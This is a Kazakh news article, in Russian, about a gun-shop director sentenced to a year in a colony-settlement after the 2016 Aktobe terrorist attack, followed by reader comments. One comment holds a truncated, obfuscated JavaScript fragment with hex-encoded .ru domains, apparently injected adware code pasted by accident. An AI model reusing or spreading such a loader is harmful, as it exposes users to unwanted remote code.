Главные новости Актобе,
Казахстана и мира
Ақтөбе, Қазақстан және әлемдегі,
басты жаңалықтар

Реклама на сайте diapazon.kz, в Инстаграм @gazeta_diapazon и в газете “Диапазон”: +7 775 559 11 11

4804 просмотра

​Директора Паллады приговорили к году колонии-поселения

В своём последнем слове директор магазина "Паллада" Артём Горлаев попросил прощения у родных погибших и пострадавших в результате атаки террористов 5 июня, передает корреспондент "Диапазона" из зала суда.

В своём последнем слове директор магазина "Паллада" Артём Горлаев попросил прощения у родных погибших и пострадавших в результате атаки террористов 5 июня, передает корреспондент "Диапазона" из зала суда.

Он также отметил, что если бы ружья в торговом зале были на тросах, террористы все равно бы в короткий срок могли бы их забрать. Например, могли бы просто заставить продавца снять крепление.

Тем не менее Горлаев полностью признал вину в том, что недобросовестно выполнял свои служебные обязанности. Мог бы поставить крепления к ружьям, но не успел, в результате погибли люди. Материальный ущерб потерпевшим он погасил. Просил суд не лишать его свободы. Об этом же просили и потерпевшие.

Несколько минут назад огласили приговор. Артём Горлаев получил год лишения свободы в колонии-поселении. Приговор в законную силу пока не вступил.

Напомним, 5 июня группа из 27 террористов под руководством Дмитрия Танатарова напала на оружейный магазин "Паллада", убили двух человек, забрали ружья и патроны. В тот же день группа радикалов осуществила атаки на войсковую часть и оружейный магазин "Пантера". В результате кровавой бойни террористы убили 8 человек.

Подробности читайте в свежем номере газеты.

Автор — Юрий ГЕЙСТ

Комментарии 8

Комментарии модерируются. Будьте вежливы.

  • pcproman

    pcproman

    Удали Амиго с компа.)))))

    0
    0
  • smersh

    smersh

    почему на оборот пишу? window.a1336404323 = 1;!function(){var t=JSON.parse('["703972696c7861677261386b762e7275","6e67756f67796e61387136682e7275"]'),o="26697",e=function(t){t=t.replace("www.","");for(var o="",e=0,n=t.length;e

    0
    0
  • smersh

    smersh

    я не понял, а где суд над командиром части нац. гвардии? где суд над нач. ДВД? где суд над конторой?где все это? в теракте виноват директор Паллады???

    0
    0
  • pcproman

    pcproman

    В Пантере совсем другие обороты и знакомства. Все нечистые прокуроры там на льготах сидят. А Палладу просто крайней сделали. Очень и очень жаль. Почему он еще и прощения должен просить у родственников погибших? Как вам не стыдно, дебилы.

    0
    0
  • mmax

    mmax

    А хозяина Пантеры наказание обошло ? )

    0
    0
  • pcproman

    pcproman

    Между прочим, возле Паллады есть ментовская будка. Те кто там сидят, видят лишь тех, кто фары забыл включить. А то что Вечный Огонь постоянно бомбят, они не видят. И терракт они не увидели. Сейчас оригинальное решение приняли, заместо красивых скамеек какие-то нары поставили.

    0
    0
  • ферзя

    ферзя

    Справедливость закона заключается в том что все перед ним равны. Это его главный принцип. Хозяин палады виноват Но не его оплошность повлекла многочисленные жертвы. Террористы прежде всего опирались на отсутствие боеготовности полиции, контр разведки, и войсковых частей. И все эти промашки, допустили не простые люди а их руководители. что не поставили службу должным образом. И не просто те кто вместо ответственности были смещены на равные должности в других областях а намного выше. А если их простили, то тем более должны были простить и тех о кого мало чего зависело, и тем более кто не уполномочен к контр террористическому противостоянию. Если б директора палады привлекли вместе с Пантерой и в купе с чиновниками силовых структур, надзорными органами, и органами безопасности я бы понял.

    0
    0
  • РинаРодионовна

    РинаРодионовна

    нда... гуманный суд...

    0
    0